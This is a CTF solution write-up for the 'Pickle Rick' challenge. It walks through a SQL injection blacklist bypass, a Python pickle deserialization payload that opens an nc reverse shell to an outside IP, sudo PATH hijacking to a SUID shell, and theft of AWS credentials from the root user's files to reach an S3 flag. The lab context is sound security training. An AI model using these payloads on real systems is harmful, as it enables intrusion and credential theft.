Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page
  • Description
  • Solution
  • Flag

Was this helpful?

  1. Authored
  2. Lag and Crash 2023

Pickle Rick

Difficulty
Points
Solves

Hard

X

X

Description

Rick has turned himself into a pickle, can you find him before its too late...

File is temporarily hosted at https://drive.google.com/file/d/1ZULGK4p7cJQHNabmDHdtki-g1xNfHu0f

MD5: ba83987433851f2101f846e89b9b99f6 SHA256: 1dd4388022be3946a72dd3fcf2603896396a8574d5dbe214f9ecf1b0a8b2db92 Password: &y9PBYf8gZ^996s9

I will suggest giving participants link to download the file before the CTF start, and only release the password after the CTF started.

Solution

  1. sql injection bypassing blacklist

"oR"2"LiKE"2

  1. Python insecure desirialization with the pickle modules for RCE

sample payload

import pickle
import os

class RCE:
def __reduce__(self):
 cmd = 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.174.136 4444 >/tmp/f'
 return os.system, (cmd,)

if __name__ == '__main__':
pickled = pickle.dumps(RCE())

with open("pickled_data.pickle", "wb") as f:
 f.write(pickled)

  1. Binary with the SUID bit in opt director /opt/clean_pickle.sh

Running sudo -l shows the user is able to run sudo on /opt/clean_pickle.sh with SETENV AND NOPASSWD

Exploit script

echo "cp /bin/sh /tmp/qaz; chmod +s /tmp/qaz" > /tmp/rm
sudo PATH=/tmp:$PATH /opt/clean_pickle.sh

/tmp/qaz -p

  1. Pivoting to AWS Cloud

In /root/.aws/credentials there is a clear text IAM Creds for AWS cloud. Enumerate the perms and list the s3 files.

[default]

aws_access_key_id = redacted
aws_secret_access_key = redacted

  1. Get flag :D

aws configure
AWS Access Key ID [****************E5EW]: redacted
AWS Secret Access Key [****************O+wn]: redacted
Default region name [None]: 
Default output format [None]: 

aws s3 ls
2023-02-13 16:12:01 lnc-pickle-shop

aws s3 ls lnc-pickle-shop
2023-02-13 16:12:56         26 flag.txt

aws s3 cp  s3://lnc-pickle-shop/flag.txt flag.txt
download: s3://lnc-pickle-shop/flag.txt to ./flag.txt            

cat flag.txt

Flag

LNC2023{1m_p1ckl3_r1111ck}

PreviousManaged SecretsNextCloudy with a chance of meatball

Last updated 4 months ago

Was this helpful?